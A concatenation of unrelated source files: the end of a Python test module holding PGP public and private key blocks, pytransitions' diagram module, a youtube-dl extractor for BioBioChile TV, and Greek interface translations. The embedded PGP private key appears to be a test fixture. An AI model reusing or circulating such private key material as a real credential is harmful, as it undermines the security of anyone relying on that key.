Z1vdeqLwTbUspqXflkCkFtfhGKMq5rH8GV5a3tXZkRWZhdNwhVXZagC3ABEBAAG0
IWFub3RoZXJ1c2VyIDxhbm90aGVydXNlckBsZWFwLnNlPoi4BBMBAgAiBQJRjAle
AhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAKCRB/nfpof+5XWotuA/4tLN4E
gUr7IfLy2HkHAxzw7A4rqfMN92DIM9mZrDGaWRrOn3aVF7VU1UG7MDkHfPvp/cFw
ezoCw4s4IoHVc/pVlOkcHSyt4/Rfh248tYEJmFCJXGHpkK83VIKYJAithNccJ6Q4
JE/o06Mtf4uh/cA1HUL4a4ceqUhtpLJULLeKo7iNBFGMCV4BBADsyQI7GR0wSAxz
VayLjuPzgT+bjbFeymIhjuxKIEwnIKwYkovztW+4bbOcQs785k3Lp6RzvigTpQQt
Z/hwcLOqZbZw8t/24+D+Pq9mMP2uUvCFFqLlVvA6D3vKSQ/XNN+YB919WQ04jh63
yuRe94WenT1RJd6xU1aaUff4rKizuQARAQABiJ8EGAECAAkFAlGMCV4CGwwACgkQ
f536aH/uV1rPZQQAqCzRysOlu8ez7PuiBD4SebgRqWlxa1TF1ujzfLmuPivROZ2X
Kw5aQstxgGSjoB7tac49s0huh4X8XK+BtJBfU84JS8Jc2satlfwoyZ35LH6sDZck
I+RS/3we6zpMfHs3vvp9xgca6ZupQxivGtxlJs294TpJorx+mFFqbV17AzQ=
=Thdu
-----END PGP PUBLIC KEY BLOCK-----
"""
PRIVATE_KEY_2 = """
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
lQHYBFGMCV4BBADG0yh7jyefxpN+JfWdOn/tFgl0w13bXtVAaA7WdXqwG7nYAuDD
kYKriqqI9x4cNPyC6ifPBnDiZiiv2xKCALimqpcwxe1AGKTrD2WWJrUXzwtqUwp1
6mdb3Xqi8E21LKal35ZApBbX4RijKuax/BleWt7V2ZEVmYXTcIVV2WoAtwARAQAB
AAP7BLuSAx7tOohnimEs74ks8l/L6dOcsFQZj2bqs4AoY3jFe7bV0tHr4llypb/8
H3/DYvpf6DWnCjyUS1tTnXSW8JXtx01BUKaAufSmMNg9blKV6GGHlT/Whe9uVyks
7XHk/+9mebVMNJ/kNlqq2k+uWqJohzC8WWLRK+d1tBeqDsECANZmzltPaqUsGV5X
C3zszE3tUBgptV/mKnBtopKi+VH+t7K6fudGcG+bAcZDUoH/QVde52mIIjjIdLje
uajJuHUCAO1mqh+vPoGv4eBLV7iBo3XrunyGXiys4a39eomhxTy3YktQanjjx+ty
GltAGCs5PbWGO6/IRjjvd46wh53kzvsCAO0J97gsWhzLuFnkxFAJSPk7RRlyl7lI
1XS/x0Og6j9XHCyY1OYkfBm0to3UlCfkgirzCYlTYObCofzdKFIPDmSqHbQhYW5v
dGhlcnVzZXIgPGFub3RoZXJ1c2VyQGxlYXAuc2U+iLgEEwECACIFAlGMCV4CGwMG
CwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEH+d+mh/7ldai24D/i0s3gSBSvsh
8vLYeQcDHPDsDiup8w33YMgz2ZmsMZpZGs6fdpUXtVTVQbswOQd8++n9wXB7OgLD
izgigdVz+lWU6RwdLK3j9F+Hbjy1gQmYUIlcYemQrzdUgpgkCK2E1xwnpDgkT+jT
oy1/i6H9wDUdQvhrhx6pSG2kslQst4qjnQHYBFGMCV4BBADsyQI7GR0wSAxzVayL
juPzgT+bjbFeymIhjuxKIEwnIKwYkovztW+4bbOcQs785k3Lp6RzvigTpQQtZ/hw
cLOqZbZw8t/24+D+Pq9mMP2uUvCFFqLlVvA6D3vKSQ/XNN+YB919WQ04jh63yuRe
94WenT1RJd6xU1aaUff4rKizuQARAQABAAP9EyElqJ3dq3EErXwwT4mMnbd1SrVC
rUJrNWQZL59mm5oigS00uIyR0SvusOr+UzTtd8ysRuwHy5d/LAZsbjQStaOMBILx
77TJveOel0a1QK0YSMF2ywZMCKvquvjli4hAtWYz/EwfuzQN3t23jc5ny+GqmqD2
3FUxLJosFUfLNmECAO9KhVmJi+L9dswIs+2Dkjd1eiRQzNOEVffvYkGYZyKxNiXF
UA5kvyZcB4iAN9sWCybE4WHZ9jd4myGB0MPDGxkCAP1RsXJbbuD6zS7BXe5gwunO
2q4q7ptdSl/sJYQuTe1KNP5d/uGsvlcFfsYjpsopasPjFBIncc/2QThMKlhoEaEB
/0mVAxpT6SrEvUbJ18z7kna24SgMPr3OnPMxPGfvNLJY/Xv/A17YfoqjmByCvsKE
JCDjopXtmbcrZyoEZbEht9mko4ifBBgBAgAJBQJRjAleAhsMAAoJEH+d+mh/7lda
z2UEAKgs0crDpbvHs+z7ogQ+Enm4EalpcWtUxdbo83y5rj4r0TmdlysOWkLLcYBk
o6Ae7WnOPbNIboeF/FyvgbSQX1POCUvCXNrGrZX8KMmd+Sx+rA2XJCPkUv98Hus6
THx7N776fcYHGumbqUMYrxrcZSbNveE6SaK8fphRam1dewM0
=a5gs
-----END PGP PRIVATE KEY BLOCK-----
"""
| gpl-3.0 |
pytransitions/transitions | transitions/extensions/diagrams.py | 1 | 13658 | from transitions import Transition
from transitions.extensions.markup import MarkupMachine
from transitions.core import listify
import logging
from functools import partial
import copy
# Module-level logger; the NullHandler prevents "no handlers" warnings when
# the embedding application has not configured logging.
_LOGGER = logging.getLogger(__name__)
_LOGGER.addHandler(logging.NullHandler())
# this is a workaround for dill issues when partials and super is used in conjunction
# without it, Python 3.0 - 3.3 will not support pickling
# https://github.com/pytransitions/transitions/issues/236
_super = super
class TransitionGraphSupport(Transition):
    """ Transition variant used together with (Nested)Graphs: whenever the
        transition is conducted, the model's graph styling is updated to
        reflect the previous transition and the new active state(s).
    """

    def __init__(self, *args, **kwargs):
        # 'label' is graph-only configuration; strip it before it reaches
        # the Transition constructor
        graph_label = kwargs.pop('label', None)
        _super(TransitionGraphSupport, self).__init__(*args, **kwargs)
        if graph_label:
            self.label = graph_label

    def _change_state(self, event_data):
        model_graph = event_data.machine.model_graphs[id(event_data.model)]
        model_graph.reset_styling()
        model_graph.set_previous_transition(self.source, self.dest, event_data.event.name)
        _super(TransitionGraphSupport, self)._change_state(event_data)  # pylint: disable=protected-access
        # the graph might have been regenerated during the state change, so
        # look it up again before styling the now-active state(s)
        model_graph = event_data.machine.model_graphs[id(event_data.model)]
        current_states = listify(getattr(event_data.model, event_data.machine.model_attribute))
        for state in _flatten(current_states):
            node_name = self.dest if hasattr(state, 'name') else state
            model_graph.set_node_style(node_name, 'active')
class GraphMachine(MarkupMachine):
    """ Extends transitions.core.Machine with graph support.
        Is also used as a mixin for HierarchicalMachine.

        Attributes:
            _pickle_blacklist (list): Objects that should not/do not need to be pickled.
            transition_cls (cls): TransitionGraphSupport
    """

    _pickle_blacklist = ['model_graphs']
    transition_cls = TransitionGraphSupport

    # default Graphviz attributes applied to the generated graph
    machine_attributes = {
        'directed': 'true',
        'strict': 'false',
        'rankdir': 'LR',
    }

    # overrides merged on top of machine_attributes for hierarchical machines
    hierarchical_machine_attributes = {
        'rankdir': 'TB',
        'rank': 'source',
        'nodesep': '1.5',
        'compound': 'true'
    }

    # Graphviz styles for nodes, edges and (sub)graphs keyed by styling state
    # ('active', 'previous', ...); '' and 'default' provide the fallbacks.
    style_attributes = {
        'node': {
            '': {},
            'default': {
                'style': 'rounded, filled',
                'shape': 'rectangle',
                'fillcolor': 'white',
                'color': 'black',
                'peripheries': '1'
            },
            'inactive': {
                'fillcolor': 'white',
                'color': 'black',
                'peripheries': '1'
            },
            'parallel': {
                'shape': 'rectangle',
                'color': 'black',
                'fillcolor': 'white',
                'style': 'dashed, rounded, filled',
                'peripheries': '1'
            },
            'active': {
                'color': 'red',
                'fillcolor': 'darksalmon',
                'peripheries': '2'
            },
            'previous': {
                'color': 'blue',
                'fillcolor': 'azure2',
                'peripheries': '1'
            }
        },
        'edge': {
            '': {},
            'default': {
                'color': 'black'
            },
            'previous': {
                'color': 'blue'
            }
        },
        'graph': {
            '': {},
            'default': {
                'color': 'black',
                'fillcolor': 'white',
                'style': 'solid'
            },
            'previous': {
                'color': 'blue',
                'fillcolor': 'azure2',
                'style': 'filled'
            },
            'active': {
                'color': 'red',
                'fillcolor': 'darksalmon',
                'style': 'filled'
            },
            'parallel': {
                'color': 'black',
                'fillcolor': 'white',
                'style': 'dotted'
            }
        }
    }

    # model_graphs cannot be pickled. Omit them.
    def __getstate__(self):
        # self.pkl_graphs = [(g.markup, g.custom_styles) for g in self.model_graphs]
        return {k: v for k, v in self.__dict__.items() if k not in self._pickle_blacklist}

    def __setstate__(self, state):
        """ Restores the pickled state and regenerates the (unpicklable) graphs. """
        self.__dict__.update(state)
        self.model_graphs = {}  # reinitialize new model_graphs
        for model in self.models:
            try:
                _ = self._get_graph(model, title=self.title)
            except AttributeError as e:
                _LOGGER.warning("Graph for model could not be initialized after pickling: %s", e)

    def __init__(self, *args, **kwargs):
        # remove graph config from keywords
        self.title = kwargs.pop('title', 'State Machine')
        self.show_conditions = kwargs.pop('show_conditions', False)
        self.show_state_attributes = kwargs.pop('show_state_attributes', False)
        # in MarkupMachine this switch is called 'with_auto_transitions'
        # keep 'auto_transitions_markup' for backwards compatibility
        kwargs['auto_transitions_markup'] = kwargs.get('auto_transitions_markup', False) or \
            kwargs.pop('show_auto_transitions', False)
        self.model_graphs = {}
        # determine graph engine; if pygraphviz cannot be imported, fall back to graphviz
        use_pygraphviz = kwargs.pop('use_pygraphviz', True)
        if use_pygraphviz:
            try:
                import pygraphviz
            except ImportError:
                use_pygraphviz = False
        self.graph_cls = self._init_graphviz_engine(use_pygraphviz)
        _LOGGER.debug("Using graph engine %s", self.graph_cls)
        _super(GraphMachine, self).__init__(*args, **kwargs)
        # for backwards compatibility assign get_combined_graph to get_graph
        # if model is not the machine
        if not hasattr(self, 'get_graph'):
            setattr(self, 'get_graph', self.get_combined_graph)

    def _init_graphviz_engine(self, use_pygraphviz):
        """ Returns the Graph class of the chosen backend (pygraphviz or
            graphviz); nested machines get the NestedGraph variant. """
        if use_pygraphviz:
            try:
                # state class needs to have a separator and machine needs to be a context manager
                if hasattr(self.state_cls, 'separator') and hasattr(self, '__enter__'):
                    from .diagrams_pygraphviz import NestedGraph as Graph
                    self.machine_attributes.update(self.hierarchical_machine_attributes)
                else:
                    from .diagrams_pygraphviz import Graph
                return Graph
            except ImportError:
                pass
        if hasattr(self.state_cls, 'separator') and hasattr(self, '__enter__'):
            from .diagrams_graphviz import NestedGraph as Graph
            self.machine_attributes.update(self.hierarchical_machine_attributes)
        else:
            from .diagrams_graphviz import Graph
        return Graph

    def _get_graph(self, model, title=None, force_new=False, show_roi=False):
        """ Returns the model's graph, (re-)generating it when `force_new` is
            set or no graph has been created for the model yet. """
        if force_new:
            grph = self.graph_cls(self, title=title if title is not None else self.title)
            self.model_graphs[id(model)] = grph
            try:
                for state in _flatten(listify(getattr(model, self.model_attribute))):
                    # style the model's current state(s) as active; the machine
                    # has no 'dest' attribute -- the previous 'self.dest' here
                    # (copied from TransitionGraphSupport._change_state) raised
                    # AttributeError and silently skipped the styling
                    grph.set_node_style(state.name if hasattr(state, 'name') else state, 'active')
            except AttributeError:
                _LOGGER.info("Could not set active state of diagram")
        try:
            m = self.model_graphs[id(model)]
        except KeyError:
            _ = self._get_graph(model, title, force_new=True)
            m = self.model_graphs[id(model)]
        m.roi_state = getattr(model, self.model_attribute) if show_roi else None
        return m.get_graph(title=title)

    def get_combined_graph(self, title=None, force_new=False, show_roi=False):
        """ This method is currently equivalent to 'get_graph' of the first machine's model.
            In future releases of transitions, this function will return a combined graph with active states
            of all models.

            Args:
                title (str): Title of the resulting graph.
                force_new (bool): If set to True, (re-)generate the model's graph.
                show_roi (bool): If set to True, only render states that are active and/or can be reached from
                    the current state.

            Returns: AGraph of the first machine's model.
        """
        _LOGGER.info('Returning graph of the first model. In future releases, this '
                     'method will return a combined graph of all models.')
        return self._get_graph(self.models[0], title, force_new, show_roi)

    def add_model(self, model, initial=None):
        """ Calls the base method and binds a 'get_graph' method to each new model. """
        models = listify(model)
        # use _super for consistency with the module's dill pickling workaround
        _super(GraphMachine, self).add_model(models, initial)
        for mod in models:
            mod = self if mod == 'self' else mod
            if hasattr(mod, 'get_graph'):
                raise AttributeError('Model already has a get_graph attribute. Graph retrieval cannot be bound.')
            setattr(mod, 'get_graph', partial(self._get_graph, mod))
            _ = mod.get_graph(title=self.title, force_new=True)  # initialises graph

    def add_states(self, states, on_enter=None, on_exit=None,
                   ignore_invalid_triggers=None, **kwargs):
        """ Calls the base method and regenerates all models's graphs. """
        _super(GraphMachine, self).add_states(states, on_enter=on_enter, on_exit=on_exit,
                                              ignore_invalid_triggers=ignore_invalid_triggers, **kwargs)
        for model in self.models:
            model.get_graph(force_new=True)

    def add_transition(self, trigger, source, dest, conditions=None,
                       unless=None, before=None, after=None, prepare=None, **kwargs):
        """ Calls the base method and regenerates all models's graphs. """
        _super(GraphMachine, self).add_transition(trigger, source, dest, conditions=conditions, unless=unless,
                                                  before=before, after=after, prepare=prepare, **kwargs)
        for model in self.models:
            model.get_graph(force_new=True)
class BaseGraph(object):
    """ Abstract base for the backend-specific graph builders.

        Subclasses must implement ``generate`` (called from ``__init__``) to
        build ``self.fsm_graph``.

        Attributes:
            machine (GraphMachine): machine the graph is generated for
            fsm_graph: the generated, backend-specific graph object
            roi_state: when set, only the region of interest around this
                state is rendered
    """

    def __init__(self, machine, title=None):
        self.machine = machine
        self.fsm_graph = None
        self.roi_state = None
        self.generate(title)

    def _convert_state_attributes(self, state):
        """ Returns the node label of a markup state; when the machine's
            'show_state_attributes' is set, tags, enter/exit callbacks and
            timeouts are appended (using Graphviz '\\l' line breaks). """
        label = state.get('label', state['name'])
        if self.machine.show_state_attributes:
            if 'tags' in state:
                label += ' [' + ', '.join(state['tags']) + ']'
            if 'on_enter' in state:
                label += r'\l- enter:\l + ' + r'\l + '.join(state['on_enter'])
            if 'on_exit' in state:
                label += r'\l- exit:\l + ' + r'\l + '.join(state['on_exit'])
            if 'timeout' in state:
                label += r'\l- timeout(' + state['timeout'] + 's) -> (' + ', '.join(state['on_timeout']) + ')'
        return label

    def _transition_label(self, tran):
        """ Returns the edge label of a markup transition; internal
            transitions are marked and, when 'show_conditions' is set,
            conditions/unless callbacks are appended. """
        edge_label = tran.get('label', tran['trigger'])
        if 'dest' not in tran:
            edge_label += " [internal]"
        if self.machine.show_conditions and any(prop in tran for prop in ['conditions', 'unless']):
            return '{edge_label} [{conditions}]'.format(
                edge_label=edge_label,
                conditions=' & '.join(tran.get('conditions', []) + ['!' + u for u in tran.get('unless', [])]),
            )
        return edge_label

    def _get_global_name(self, path):
        """ Resolves the globally unique name of the (nested) state at 'path'
            by recursively entering each scope on the path. """
        if path:
            state = path.pop(0)
            with self.machine(state):
                return self._get_global_name(path)
        else:
            return self.machine.get_global_name()

    def _get_elements(self):
        """ Collects all states and transitions from the machine's markup,
            qualifying nested sources/destinations with their parent prefix.

            Returns:
                tuple(list, list): top-level markup states and all transitions.
        """
        states = []
        transitions = []
        try:
            markup = self.machine.get_markup_config()
            queue = [([], markup)]
            while queue:
                prefix, scope = queue.pop(0)
                for transition in scope.get('transitions', []):
                    if prefix:
                        tran = copy.copy(transition)
                        tran['source'] = self.machine.state_cls.separator.join(prefix + [tran['source']])
                        if 'dest' in tran:  # don't do this for internal transitions
                            tran['dest'] = self.machine.state_cls.separator.join(prefix + [tran['dest']])
                    else:
                        tran = transition
                    transitions.append(tran)
                for state in scope.get('children', []) + scope.get('states', []):
                    if not prefix:
                        states.append(state)
                    ini = state.get('initial', [])
                    if not isinstance(ini, list):
                        # add an invisible anchor edge pointing at the initial child
                        ini = ini.name if hasattr(ini, 'name') else ini
                        tran = dict(trigger='',
                                    source=self.machine.state_cls.separator.join(prefix + [state['name']]) + '_anchor',
                                    dest=self.machine.state_cls.separator.join(prefix + [state['name'], ini]))
                        transitions.append(tran)
                    if state.get('children', []):
                        queue.append((prefix + [state['name']], state))
        except KeyError as e:
            # include the offending key; the exception was previously bound but never logged
            _LOGGER.error("Graph creation incomplete! Missing key: %s", e)
        return states, transitions
def _flatten(item):
for elem in item:
if isinstance(elem, (list, tuple, set)):
for res in _flatten(elem):
yield res
else:
yield elem
| mit |
marcwebbie/youtube-dl | youtube_dl/extractor/biobiochiletv.py | 16 | 3367 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
remove_end,
)
from .rudo import RudoIE
class BioBioChileTVIE(InfoExtractor):
    # Extractor for video notes on BioBioChile TV (biobiochile.cl). The media
    # itself is embedded via the Rudo platform and delegated to RudoIE through
    # a url_transparent result; only metadata is scraped from the page here.
    _VALID_URL = r'https?://(?:tv|www)\.biobiochile\.cl/(?:notas|noticias)/(?:[^/]+/)+(?P<id>[^/]+)\.shtml'

    _TESTS = [{
        'url': 'http://tv.biobiochile.cl/notas/2015/10/21/sobre-camaras-y-camarillas-parlamentarias.shtml',
        'md5': '26f51f03cf580265defefb4518faec09',
        'info_dict': {
            'id': 'sobre-camaras-y-camarillas-parlamentarias',
            'ext': 'mp4',
            'title': 'Sobre Cámaras y camarillas parlamentarias',
            # raw string: '\.' is an invalid escape in a plain string literal
            'thumbnail': r're:^https?://.*\.jpg$',
            'uploader': 'Fernando Atria',
        },
        'skip': 'URL expired and redirected to http://www.biobiochile.cl/portada/bbtv/index.html',
    }, {
        # different uploader layout
        'url': 'http://tv.biobiochile.cl/notas/2016/03/18/natalia-valdebenito-repasa-a-diputado-hasbun-paso-a-la-categoria-de-hablar-brutalidades.shtml',
        'md5': 'edc2e6b58974c46d5b047dea3c539ff3',
        'info_dict': {
            'id': 'natalia-valdebenito-repasa-a-diputado-hasbun-paso-a-la-categoria-de-hablar-brutalidades',
            'ext': 'mp4',
            'title': 'Natalia Valdebenito repasa a diputado Hasbún: Pasó a la categoría de hablar brutalidades',
            'thumbnail': r're:^https?://.*\.jpg$',
            'uploader': 'Piangella Obrador',
        },
        'params': {
            'skip_download': True,
        },
        'skip': 'URL expired and redirected to http://www.biobiochile.cl/portada/bbtv/index.html',
    }, {
        'url': 'http://www.biobiochile.cl/noticias/bbtv/comentarios-bio-bio/2016/07/08/edecanes-del-congreso-figuras-decorativas-que-le-cuestan-muy-caro-a-los-chilenos.shtml',
        'info_dict': {
            'id': 'edecanes-del-congreso-figuras-decorativas-que-le-cuestan-muy-caro-a-los-chilenos',
            'ext': 'mp4',
            'uploader': '(none)',
            'upload_date': '20160708',
            'title': 'Edecanes del Congreso: Figuras decorativas que le cuestan muy caro a los chilenos',
        },
    }, {
        'url': 'http://tv.biobiochile.cl/notas/2015/10/22/ninos-transexuales-de-quien-es-la-decision.shtml',
        'only_matching': True,
    }, {
        'url': 'http://tv.biobiochile.cl/notas/2015/10/21/exclusivo-hector-pinto-formador-de-chupete-revela-version-del-ex-delantero-albo.shtml',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        # all playable content is served through a Rudo embed; without one
        # there is nothing to extract
        rudo_url = RudoIE._extract_url(webpage)
        if not rudo_url:
            raise ExtractorError('No videos found')

        title = remove_end(self._og_search_title(webpage), ' - BioBioChile TV')
        thumbnail = self._og_search_thumbnail(webpage)
        uploader = self._html_search_regex(
            r'<a[^>]+href=["\']https?://(?:busca|www)\.biobiochile\.cl/(?:lista/)?(?:author|autor)[^>]+>(.+?)</a>',
            webpage, 'uploader', fatal=False)

        # delegate format extraction to RudoIE, keeping the scraped metadata
        return {
            '_type': 'url_transparent',
            'url': rudo_url,
            'id': video_id,
            'title': title,
            'thumbnail': thumbnail,
            'uploader': uploader,
        }
| unlicense |
julianprabhakar/eden_car | languages/el.py | 6 | 106034 | # -*- coding: utf-8 -*-
{
"If this setting is enabled then all deleted records are just flagged as deleted instead of being really deleted. They will appear in the raw database access but won't be visible to normal users.": 'Εαν αυτή η ρύθμιση είναι ενεργοποιημένη, τότε όλα τα διεγραμένα πεδία είναι απλά σημειωμένα ως διεγραμμένα αντί να διεγραφούν πραγματικά. Θα εμφανίζοντια στη βάση δεδομένων, αλλά δεν θα είναι ορατά στους απλούς χρήστες.',
"Phone number to donate to this organization's relief efforts.": 'Αριθμός τηλεφώνου για δωρεές για τις προσπάθειες ανακούφισης που προσφέρονται από τον οργανισμό.',
"Sorry, things didn't get done on time.": 'Συγνώμμη, τα πράγρματα δεν έγιναν εγκαίρως',
"Sorry, we couldn't find that page.": 'Λυπούμαστε, αλλά δεν μπορέσαμε να βρούμε αυτή τη σελίδα.',
"System's Twitter account updated": 'Λογαριασμός Twitter του Συστήματος ενημέρωθηκε',
"The person's manager within this Office/Project.": 'Ο διευτθυντής του ατόμου στο γραφείο του (ή σε έργο του)',
"To search for a body, enter the ID label of the body. You may use % as wildcard. Press 'Search' without input to list all bodies.": 'Για να αναζητήσετε μ΄πιθα σορό, πληκτρολογήστε την ετικέτα ID του σορού. Μπορείτε να χρησιμοποιήσετε το% ως τελεστή. Πατήστε «Αναζήτηση» χωρίς εισαγωγή στην λίστα όλων των φορέων.',
"To search for a hospital, enter any of the names or IDs of the hospital, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all hospitals.": 'Για να αναζητήσετε νοσοκομείο, εισάγεται οποιοδήποτε από ταονόματα ή τα ID των νοσοκομείων, διαχωριζόμενα από κενά. Μπορείτε να χρησιμοποιήσετε το % για μαζική αναζήτηση. Πιέστε "Αναζήτηση" χωρίς να εισάγετε τίποτα για να δείτε όλα τα νοσοκομεία',
"To search for a person, enter any of the first, middle or last names and/or an ID number of a person, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": 'Για την αναζήτηση ενός ατόμου, εισάγετε οποιοδήποτε από τα, όνομα, επίθετο, δεύτερο όνομα, αριθμό ταυτότητας, χωρισμένα με κενά. Μπορείτε να χρησιμοποιήσετε παραμέτρους αναζήτησης όπως το %. Πατήστε "Αναζήτηση" χωρίς καμία εισαγωγή για να δείτε όλες τις εγγραφές. ',
"View and/or update details of the person's record": 'Δείτε ή ενημερώσετε τις λεπτομέρειες των δεδομένων του ατόμου',
"You have personalised settings, so changes made here won't be visible to you. To change your personalised settings, click ": 'Έχετε προσωπικές ρυθμίσεις, οι αλλαγές που γίνονται εδώ δεν θα είναι ορατές σε σας. Για να αλλάξετε τις προσωπικές σας ρυθμίσεις, πατήστε',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"ενημέρωση" είναι κατ\' αεπιλογήν έκφρασή (expression) όπως "πεδίο1=\'νέατιμή\'". Δεν μπορείτε να ενημερώσετε ή να διαγράψετε τα αποτελέσματα του JOIN',
'# of International Staff': 'αριθμός προσωπικού από άλλες χώρες',
'# of People Affected': 'Αριθμός ατόμων που πλήττονται',
'# of People Injured': 'Αριθμός τραυματιών',
'15-30 minutes': '15-30 λεπτά',
'8-14 days': '8-14 ημέρες',
'A Reference Document such as a file, URL or contact person to verify this data. You can type the 1st few characters of the document name to link to an existing document.': 'Ένα έγγραφο αναφοράς, όπως το πρόσωπο αρχείο, URL ή άτομο επικοινωνίας για την επαλήθευση αυτών των δεδομένων. Μπορείτε να πληκτρολογήσετε μερικούς από τους πρώτους χαρακτήρες του ονόματος του εγγράφου για τη σύνδεση με ένα υπάρχον έγγραφο.',
'A Warehouse is a physical place which contains Relief Items available to be Distributed.': 'Η Αποθήκη είναι ένας χώρος ο οποίος περιέχει αντικείμενα προς τους πληγέντες διαθέσιμα για διανομή',
'A brief description of the group (optional)': 'Μία μικρή περιγραφή της ομάδας (προεραιτικό)',
'A place within a Site like a Shelf, room, bin number etc.': 'Ένα μέρος σε μία περιοχή σαν π.χ. ράφι, δωμάτιο, αριθμός δοχείου κλπ.',
'A snapshot of the location or additional documents that contain supplementary information about the Site can be uploaded here.': 'Μία "εικόνα" της περιοχής ή επιπρόσθετα έγγγραφα που περιέχουν συμπληρωματικές πληροφορίες για την περιοχή μπορούν να "μεταφορτοθούν" εδώ. ',
'ABOUT THIS MODULE': 'ΣΧΕΤΙΚΑ ΜΕ ΑΥΤΟ ΤΟ ΥΠΟΠΡΟΓΡΑΜΜΑ',
'Ability to customize the list of human resource tracked at a Shelter': 'Δυνατότητα παραμετροποίησης των ανθρώπων που εντοπίστηκαν σε ένα καταφύγιο',
'Ability to customize the list of important facilities needed at a Shelter': 'Δυνατότητα για παραμετροποίηση του καταλόγου σημαντικών υποδομών που είνια απαραίτητα σε ένα καταφήγιο',
'Ability to track partial fulfillment of the request': 'Δυνατότητα εντοπισμού-καταγραφή μερικής ικανοποίησης του αιτήματος',
'Ability to view Results of Completed and/or partially filled out Surveys': 'Δυνατότητα για προβολή αποτελεσμάτων συμπληρωμένων ή ημιτελών Ερευνών',
'Access to Shelter': 'Πρόσβαση σε καταφύγιο',
'Activities': 'Λραστηριότητες',
'Activity Details': 'Λεπτομέρειες Δραστηριότητας',
'Add Address': 'Προσθήκη νέας Διεύθυνσης',
'Add Baseline': 'Προσθήκη Αρχικής κατάστασης',
'Add Bins': 'Προσθήκη Κάδων',
'Add Contact': 'Προσθήκη επαφής',
'Add Credentials': 'Προσθήκη Πιστοποιήσεων',
'Add Donor': 'Προσθήκη Δωρητών',
'Add Identity': 'Προσθήκη Ταυτότητας',
'Add Image': 'Προσθήκη εικόνας',
'Add Item Catalog Category ': 'Προσθήκη κατηγορίας καταλόγου αντικειμένων',
'Add Key': 'Προσθήκη κλειδιού(key)',
'Add Kit': 'Προσθήκη Kit',
'Add Locations': 'Προσθήκη θέσεων',
'Add Log Entry': 'Προσθήκη εισαγωγής καταγραφής(Log Entry)',
'Add Member': 'Προσθήκη μέλους',
'Add Membership': 'Προσθήκη Μέλους',
'Add Message': 'Προσθήκη μηνύματος',
'Add Need Type': 'Προσθήκη Τύπου Ανάγκης',
'Add New Assessment Summary': 'Πρόσθεσε νέα έκθεση αξιολόγησης',
'Add New Donor': 'Προσθήκη νέου δωρητή',
'Add New Flood Report': 'Προσθήκη νέας Έκθεσης Πλημμυρών',
'Add New Key': 'Προσθήκη νέου κλειδιού',
'Add New Need': 'Προσθήκη Νέων Αναγκών',
'Add New Request Item': 'Προσθήκη νέου αντικειμένου που ζητήθηκε',
'Add New Response': 'Προσθήκη νέας ανταπόκρισης',
'Add New Storage Location': 'Προσθήκη νέας περιοχής αποθήκευσης',
'Add Person': 'Προσθήκη ατόμου',
'Add Position': 'Προσθήκη θέσης',
'Add Recipient Site.': 'Προσθήκη Περιοχής αποστολής προς',
'Add Recovery Report': 'Προσθήκη Αναφοράς Ανάκτησης-Εύρεσης',
'Add Request Item': 'Προσθήκη Αντικειμένου που ζητήθηκε',
'Add Sender Organization': 'Προσθήκη οργανισμού που αποστέλει',
'Add Sender Site': 'Προσθήκη Περιοχής Αποστολέα',
'Add Site': 'Προσθήκη τοποθεσίας',
'Add Skill Types': 'Προσκθήκη κατηγορίας προσόντων',
'Add Survey Question': 'Προσθήκη ερώτησης έρευνας',
'Add Survey Section': 'Προσθήκη Τομέα Αναζήτησης',
'Add Survey Template': 'Προσθήκη Προτύπου Έρευνας',
'Add Team Member': 'Προσθήκη μέλους',
'Add Team': 'Προσθήκη Ομάδας',
'Add Unit': 'Προσθήκη Μονάδας',
'Add Warehouse Item': 'Προσθήκη αντικειμένου αποθήκης',
'Add a new Site from where the Item is being sent.': 'Προσθήκη νέας τοποθεσίας από όπου το αντικείμενο αποστέλεται',
'Add a new Site where the Item is being sent to.': 'Προσθήκη νέας Περιοχής, όπου αντικείμενα αποστέλονται προς εκεί.',
'Add new staff role.': 'Προσθήκη νέου ρόλου προσωπικού.',
'Add the Storage Location where this this Bin belongs to.': 'Προσθέστε τον αποθηκευτικό χώρο όπου το "καλάθι" ανήκει.',
'Add the main Warehouse/Site information where this Item is to be added.': 'Προσθέστε Πληροφορίες της κύριας αποθήκης, όπου το στοιχείο αυτό πρέπει να προστεθεί.',
'Added to Group': 'Χρήστης - Μέλος προστέθηκε',
'Added to Team': 'Χρήστης - Μέλος προστέθηκε',
'Address Type': 'Τύπος διεύθυνσης',
'Address added': 'Διεύθυνση προστέθηκε',
'Address deleted': 'Διεύθυνση διεγράφη',
'Adolescent (12-20)': 'Έφηβος (12-20 ετών)',
'Adult Psychiatric': 'Ψυχιατρικό ενηλίκων',
'Adult female': 'Ενήλικας Γυναίκα ',
'Advanced Catalog Search': 'Προηγμένη αναζήτηση στο κατάλογο',
'Advanced Location Search': 'Προηγμένη αναζήτηση θέσης',
'Advanced Search': 'Σύνθετη Αναζήτηση',
'Age group does not match actual age.': 'Ηλικιακή ομάδα δεν αντιστοιχεί στην πραγματική ηλικία.',
'Airport Closure': 'Κλείσιμο Αεροδρομίου ',
'All Locations': 'Όλες οι θέσεις',
'All Requested Items': 'Όλα τα ζητηθέντα αντικείμενα',
'Allowed to push': 'Επιτρέπονται να πιέσουν',
'Allows authorized users to control which layers are available to the situation map.': 'Επιτρέπει σε εξουσιοδοτημένα μέλη να ελέγχουν πια χαρτογραφικά επίπεδα είναι διαθέσιμα στο χάρτη απεικόνισης της κατάστασης',
'An intake system, a warehouse management system, commodity tracking, supply chain management, procurement and other asset and resource management capabilities.': 'Σύστημα υποδοχής, σύστημα διαχείρισης αποθήκης, καταγραφής και παρακολουθησης αγαθών, διαχείρσης αλυσίδας προμηθειών, προμήθειας και επιπλέον δυνατοτήτων διαχείρησης πόρων.',
'Animal Feed': 'Τροφή ζώου',
'Answer Choices (One Per Line)': 'Επιλογές απαντήσεων (Μία ανά γραμμή)',
